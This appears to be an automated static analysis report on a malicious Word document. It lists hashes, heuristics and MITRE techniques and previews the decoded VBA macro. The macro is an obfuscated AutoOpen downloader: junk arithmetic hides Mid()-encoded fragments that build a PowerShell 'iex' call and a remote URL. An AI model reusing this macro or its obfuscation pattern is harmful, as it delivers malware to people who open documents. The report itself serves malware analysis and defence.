Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 478195c76979b58e…

MALICIOUS

Office (OLE)

Size: 199.5 KB
Created: 2017-12-22 18:13:00
Authoring application: Microsoft Office Word
First seen: 2018-01-08
MD5: 4926ddaa8fe8d05f2c8f9e4fac1ce859
SHA-1: 270c54fb2df972c8c316c7aae4eba27e6df71f3c
SHA-256: 478195c76979b58ebd46305ffaa034ddfa29bf29e61273b4a4256bd113e078c2
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands, likely for downloading and running a second-stage payload. The large slack space in the OLE structure is also a suspicious indicator.

Heuristics (6)

  • VBA macros detected [medium; 2 related findings; OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA [critical; OLE_VBA_SHELL]
    Shell() call in VBA.
  • AutoOpen macro [high; OLE_VBA_AUTOOPEN]
    AutoOpen macro.
  • OLE document has large unaccounted-for region [high; OLE_SLACK_ANOMALY]
    OLE file is 204,288 bytes but its declared streams total only 15,693 bytes; 188,595 bytes (92%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Legacy WordBasic auto-exec macro marker [medium; OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info; EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 73661 bytes
SHA-256: 9e8ebc2710ebb7837ac8751cd690f7500fce4b85cf18aca72122d93dfc805008

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IGVtNnN"
Sub AutoOpen()
On Error Resume Next
BmJXTGpDW = 871 / Rnd(4) + LVoUOkDb + OwHlIcRhkd * 9 + Int(WlWsJDOcwTzUbj * CStr(sFjHjvuSvQtA)) + uCYEaYn * CDate(3624 - 352183467 * 84 / 475) / wvKLWbdBQb - CSng(620)
jBakLwdtC = 871 / Rnd(4) + TbbQCMiwutu + wHtKYvN * 9 + Int(QRipNzaKqa * CStr(jVLGXTuIJtj)) + XhdESqB * CDate(3624 - 352183467 * 84 / 475) / hfiLCzmDDlX - CSng(620)
FUSNhlBWq = 871 / Rnd(4) + nEbjKGHjuIU + ztBnzEZjqFXVb * 9 + Int(FUwSRTKvubGb * CStr(qfTIdCQUZMtlw)) + JnijFIZBnncqAi * CDate(3624 - 352183467 * 84 / 475) / zZjYNjB - CSng(620)
WwtTKQfHD = 871 / Rnd(4) + UXAHLvBSSprj + nBlQamMNjNH * 9 + Int(lmmwIVfkv * CStr(diwnifGutK)) + QGRYAFVqTlJsq * CDate(3624 - 352183467 * 84 / 475) / IPUKTLwlRXH - CSng(620)
TnIhHoUza = 871 / Rnd(4) + fUZHPKtbkU + GMVPlkZwtfpt * 9 + Int(hSMIMwpvP * CStr(cuuCEBC)) + hDWNamRV * CDate(3624 - 352183467 * 84 / 475) / uwhpqbJ - CSng(620)
Application.Run "BJYBUhqczCNfwY", KLKDrCQ
azwlOnfpq = 871 / Rnd(4) + tVriVzqV + puUsZqrs * 9 + Int(wiPlSlcGDRvtYj * CStr(StwdVYBqUj)) + PGEYuXuktHsH * CDate(3624 - 352183467 * 84 / 475) / GGOuZZN - CSng(620)
RNzaftNXW = 871 / Rnd(4) + suChWVCiWYzonP + mtXPKHRvVT * 9 + Int(JitBJXO * CStr(PwEVkkMPDBOdah)) + szqHLna * CDate(3624 - 352183467 * 84 / 475) / jNUMXlVPcaozbh - CSng(620)
YmfzsNtHq = 871 / Rnd(4) + bdABSPCLowY + PXodhmlD * 9 + Int(iZLbEcOvMFZW * CStr(lulUwNYdKcJQWH)) + OjHVnosE * CDate(3624 - 352183467 * 84 / 475) / ZOmnQbtwlVlus - CSng(620)
NpYfIXwBK = 871 / Rnd(4) + UFjjwDjFtpwu + akMijLfBWOVS * 9 + Int(zIfUHnOjR * CStr(jvuuCQsEwSGz)) + vpNqfjwqKNjGbZ * CDate(3624 - 352183467 * 84 / 475) / hIfBJBdnoQ - CSng(620)
dkdKZALzN = 871 / Rnd(4) + fuzjATsYhOoa + TXnmFotSBYaCv * 9 + Int(flNVHNptmK * CStr(ApIEGZbCsKnlNF)) + URiWXjEz * CDate(3624 - 352183467 * 84 / 475) / nTthNBak - CSng(620)
End Sub
Function KLKDrCQ()
On Error Resume Next
VvNMEEdkI = 871 / Rnd(4) + wfnkGwkIlsjpCH + bTIdvdkASqXEwK * 9 + Int(MODZlrwtmhj * CStr(tzvKzmXM)) + GiwVOfVuitl * CDate(3624 - 352183467 * 84 / 475) / JfVldWGdZVwOSq - CSng(620)
zuwzA = 871 / Rnd(4) + FZcUaoKqkd + qCtPVDuOXlaj * 9 + Int(DHITKkasVNwBJM * CStr(PrwqawTwXbavXk)) + misfQSfrfA * CDate(3624 - 352183467 * 84 / 475) / uVovOMr - CSng(620)
dvTYaXc = Mid("mujGr85E872FEX'a.t7EV+7EVk/U7EV+7EVbsnq'+'7'+'EV+7EVt/'+',http:/7EV+Fn4+Fn47EV/w7EV+7EVw7EV+7EVw.cola-i7EV+7EVnfo.7EV+7'+'EVnl/Ts7EV+7EVZ7EV+7EVF2FNtRJ", 15, 131)
UXZfwNKSibv = 871 / Rnd(4) + WjXSbzz + fHDXMcz * 9 + Int(nuMkTaY * CStr(QQjClmhDXd)) + OKbKBJZpiawtAZ * CDate(3624 - 352183467 * 84 / 475) / ITGGhwHCB - CSng(620)
bUCCvIUuhz = 871 / Rnd(4) + XOonoUSNMowh + BkHqsBpNJrE * 9 + Int(uXPWuJmKAXSz * CStr(YlSZRjDjjC)) + jlmjwVOXkEuzCq * CDate(3624 - 352183467 * 84 / 475) / fKXidRIRT - CSng(620)
RnZcYT = 871 / Rnd(4) + NzUsZAzj + ltLjLatktvR * 9 + Int(jcUiOwQvCG * CStr(ZAnMFzFa)) + KWoXwjvjoLNGkm * CDate(3624 - 352183467 * 84 / 475) / UAOLDjncilm - CSng(620)
LIIwFOkCQf = Mid("G2Wr5jchAR]39) |.( $psHoMe[21]+$PShome[30]UzqiQ9GKHwD1qoRpijfkJPlc", 7, 36)
iohZImz = 871 / Rnd(4) + WnrKBCNUQ + IXCNiJvPUioPj * 9 + Int(BsIBYhXUSTahWM * CStr(BjcmzKIIKzTW)) + zpbHEsJItMwjS * CDate(3624 - 352183467 * 84 / 475) / EjnzmijSzLdjo - CSng(620)
BWoHCkadP = 871 / Rnd(4) + hCjYJGVQkDR + ZMTLTDWasPfK * 9 + Int(rEzSpzJPPdZP * CStr(MLWTrmroOotwWa)) + dhSWYqSBXw * CDate(3624 - 352183467 * 84 / 475) / FHWKjtvUqLEZXt - CSng(620)
GQaCuRZF = 871 / Rnd(4) + kwBFKiWcsSdiD + IUjChVDYWC * 9 + Int(oMfsPdUEPYvK * CStr(ZoRcrUTIiGKcf)) + CSqLczXVRrj * CDate(3624 - 352183467 * 84 / 475) / pJZnBMKpdsD - CSng(620)
OYjPztlQWdm = Mid("thwm7GYKVEMzFnh,Fn4resFn4).ReplAce(([ChAr]'+'52+[ChAr]7'+'0+[ChAr]89),Fn4SfhFn4))')  -rePLACE  'res',[chAR]124-rePLACE  ([chAR]83+[chAR]102+[chAR]104),[chAR]36-CrEplAcE  'Fn4',[VzmCXKb0v0", 16, 162)
hdkwI = 871 / Rnd(4) + tdQDTTWom + KCqItKwVvj
... (truncated)